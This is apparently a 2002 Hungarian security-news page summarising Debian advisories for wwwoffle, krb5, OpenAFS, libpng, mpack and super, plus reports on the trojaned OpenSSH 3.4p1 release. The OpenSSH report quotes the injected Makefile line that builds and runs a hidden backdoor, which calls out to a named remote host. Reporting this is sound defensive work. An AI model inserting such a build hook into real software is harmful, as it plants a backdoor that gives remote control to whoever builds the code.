Bug

DSA 144-1 Az új wwwoffle csomag javítja a biztonsággal kapcsolatos problémákat

Címkék

Csomag: wwwoffle

Sebezhetőség: nem megfelelő input kezelés

Probléma-típus: helyi

Debian-specifikus: nem

CVE Id: CAN-2002-0818



Egy problémát fedeztek fel a wwwoffle-val kapcsolatban. A web proxy nem kezeli megfelelően az input data-t, ahol a Content-Length beállítás egy negatív szám, és a feldolgozást végző gyerekprocesszt összeomlasztja. Jelenleg nem világos, hogyan lehetne ezt a sebezhetőséget kihasználmi, habár jobb biztonságban lenni, mint sajnálkozni, szóval itt a frissítés.Továbbá a woody verzióban az üres jelszavakat hiábsnak veszi, az autentikálás során. A woody verzióban szintén kicseréltük a CanonicaliesHost()-ot az utolsó rutinnal a 2.7d verzióból, ahogyan az upstream javasolta. Ez megállítja a hibás IPv6 formátumú IP címeket az URL-ekben, ami problémákat okozhat (pl.: memória felülírás, lehetséges exploit).



A problémát javítja a 2.5c-10.4 verzió a régi stabil disztribúcióban (potato), és a 2.7a-1.2 verzió a jelenlegi stabil disztribúcióban (woody) és a 2.7d-1 verzió az unstable disztribúcióban (sid).



Javasoljuk, frissítsd a wwwoffle csomagjaid.

Martin Schultze levele a debian-security-announce listán.

A frissítésről szóló FAQ-nk.

megj.: Ne ijedj meg, ha a Martin Schultze-s link még nem él... Megint hipergyors voltam :-)

DSA 143-1 Az új krb5 csomagok javítják az ''egész''-túlcsordulási hibát

Címkék

Csomag: krb5

Sebezhetőség: egész túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem

CERT hibajegy: VU#192995



Egy egész túlcsordulási hibát találtak az RPC könyvtárban, amit a Kerberos 5 adminisztrációs rendszer is használ. Az említett RPC könyvtár a SunRPC könyvtárból származik. Ezt a hibát ki lehet használni jogosulatlan root szerzésre egy KDC hoszton. Úgy hiszik, hogy a támadónak autentikálnia kell tudnia magát a kadmin démon felé, hogy a támadása sikeres legyen. Jelenleg nem ismeretes létező törés.A problémát javítja az 1.2.4-5woody1 verzió az aktuális stabil disztribúcióban (woody) és az 1.2.5-2 az unstable disztribúcióban (sid). A Debian 2.2 (potato) nem érintett, lévén az nem tartalmazza a krb5 csomagokat.


Javasoljuk, azonnal frissítsd a kerberos csomagjaid.

Martin Schultze levele a debian-security-announce listán.

A frissítésről szóló FAQ-nk.

DSA 142-1 Az új OpenAFS csomagok javítják az ''egész''túlcsordulási hibát

Címkék

Csomag: openafs

Sebezhet?ség: egész túlcsordulás

Proobléma-típus: távoli

Debian-specifikus: nem



Egy egész túlcsordulási hibát fedeztek fel az RPC könyvtárban amit az OpenAFS adatbázisszerver használ, és az említett könyvtár a SunRPC könyvtárból származik. Ezt a hibát ki lehet használni hogy összeomlasszunk bizonyos OpenAFS szervereket (volserverr, vlserverr, ptserver, buserver) vagy jogosulatlanul root hozzáférést szerezzünk, egy olyan gépen, ami futtatja a fenti processzek valamelyikét. Még nem ismeretes léteez? exploit a hibára.A problémát javítja az 1.2.3final2-6 verzió az aktuális stabil disztribúcióban (woody) és a 1.2.6-1 verzió az aktuális unstabil disztribúcióban (sid).

A Debian 2.2 (potato) nem érintett, lévén az még nem tartalmazza az OpenAFS csomagokatt.



Javasoljuk, hogy frissítsd az OpenAFS csomagjaid.

Martin Schultze levele a debian-security-announce listán.

A frissítésr?l szóló FAQ-nk.

DSA 140-2 Az új libpng csomagok javítanak egy lehetséges puffertúlcsordulást

Címkék

Csomag: libpng, libpng3

Sebezhetőség: Puffer-túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem



Kiegészítésként a DSA-140-1-es biztonsági hibajegyhez az alábbi csomagok javítást tartalmaznak egy lehetséges puffer-túlcsordulási hibára. A PNG könyvtár megvalósít egy biztonsági-ráhagyást, amit szintén betettek az "upstream" kiadásba. Köszönet illeti Glenn Randers-Pehrson-t, aki informálta a Debian Security Team-et.A problémát javítja az 1.0.12-3.woody.2 libpng verzió és az 1.2.1-1.1.woody.2 -es libpng3 verzió az aktuális stabil disztribúcióban (wooddy).



Javasoljuk, hogy frissítsd a libpng csomagjaid.



Martin Schultze levele a debian-security-announce listán.

A frissítésről szóló FAQ-nk.

DSA 141-1 mpack puffer túlcsordulás

Címkék

Csomag: mpack

Sebezhetőség: buffer overflow

Probléma típusa: távoli

Debian specifikus: nem




Eckehard Berns egy nem debian specifikus puffertúlcsordulást felfedezett fel a mupack programban, amit binaris - MIME dekódoláshoz használnak e-mail-ekben. Ezzel a hibával akár tetszőleges kód is lefuttatható. Azonnali frissítés javasolt...A problémát az 1.5-5potato2 csomag javítja a régi stabil disztribúcióban (potato), az 1.5-7woody2 csomag javítja az aktuális stabil disztribúcióban (woody), és az 1.5-9 csomag javítja az unstable disztribúcióban (sid).

Debian Security listán megjelent hír

Niels Provos: OpenSSH Security Advisory: Trojaned Distribution Files

Címkék

Niels Provos bejelentette a trójai OpenSSH dolgot a security-announce@, misc@ és announce@ OpenBSD listákon. Mint kiderült több csomag is érintett. Az érintett verziók:

  • OpenSSH version 3.2.2p1
  • OpenSSH version 3.4p1
  • OpenSSH version 3.4

A backdooros stuff július 30. és július 31. között került a szerverekre, és onnan kerültek át más szerverekre a normál mirrorozási folyamattal.

Kapcsolódó cikkek:
OpenSSH hiba ismét!
OpenSSH trójai!

DSA 140-1 Az új libpng csomagok javítják a puffertúlcsordulást

Címkék

Csomag: libpng2, libpng3

Támadhatóság: puffer-túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem



A PNG könyvtár fejlesztői kijavították a puffer-túlcsordulási hibát a progresszív olvasójában, ami akkor jön elő, ha a PNG adatfolyam több IDAT adatot tartalmaz mint amennyit az "IHDR chunk" jelez. Ilyen előkészített helytelen adatfolyamok összeomlasztják az alkalmazást, ami esetleg lehetővé teszi a támadó számra, hogy szabotáló kódot futtasson. Az olyan programok, mint a Galeon, Konqueror és számos más egyéb program használják ezeket a könyvtárakat.Hogy megtudd, hogy mely csomagok függenek ettől a könyvtártól futtasd a következő parancsokat:

    apt-cache showpkg libpng2
    apt-cache showpkg libpng3

DSA 139-1 Az új super csomagok javítják a helyi root exploitot

Címkék

Csomag: super

Támadhatóság: format string vulnerability

Probléma típus: helyi

Debian-specifikus: nem



A GOBBLES talált egy nem biztonságos használati módot a super csomag formátumsztringjeiben. A szuper nevű program arra való, hogy megfelelő rendszer-felhasználókhoz való hozzáférst adjon az néhány felhasználónak, úgy mint a szuper nevű program. (megj. most én nem értem rendesen az eredeti angol mondatot, vagy tényleg ilyen önrekurzív hülye módon fogalmazták meg? :-)) Kihasználva ezt a formátumsztring-támadhatóságot, a helyi felhasználók jogosulatlanul root hozzáférést szerezhetnek.A problémát a 3.12.2-2.1 javítja a régi stabil disztribúcióban (potato), a 3.16.1-1.1 javítja az aktuális stabil disztribúcióban (woody), és a 3.18.0-3 javítja az unstable disztribúcióban (sid).



Megj.: Olyan gyorsak voltunk, hogy a hír, még a debian-security archívumába se került be, de ha bekerül, vsz. ezen a linken fogod megtalálni :-)

OpenSSH trójai!

Címkék

A portolható OpenSSH forráskódjában trójai kódot fedezett fel Edwin Groothuis. Az ftp.openbsd.org-on és annak tükrein elérhető fájl MD5 ellenőrzőösszege:

MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

míg az eredeti fájlé:

MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

Az eredetihez képest az openssh-3.4p1/openbsd-compat/Makefile.in fájl változott meg, amelyhez a következő sort adták:

all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

A bf-test.c fájl a portolható OpenSSH forráskódjában soha nem szerepelt és a Makefile.in CVS információi is kitaláltak, így a gyanú beigazolódni látszik.
A bf-test valójában egy shell scriptet állít elő, amely egy C forráskódot tartalmaz. A lefordított kód a 203.62.158.32-es (web.snsonline.net) IP cím 6667-es portjára kapcsolódik és távolról vezérelhetővé válik.

OpenSSH hiba ismét!

Címkék

Ismét bebizonyosodott, hogy semmi sem tökeletes. Még a "javított" OpenSSH sem... Egy igen érdekes levelet lehet olvasni a freebsd-security@ levlistán. A levél írója szerint a 3.4-es OpenSSH BACKDOOR-os! Mindenki nézzen utána a kérdesnek, gyakorlatilag megint nem vagyunk biztonságban.

Olvasd el a levelet itt.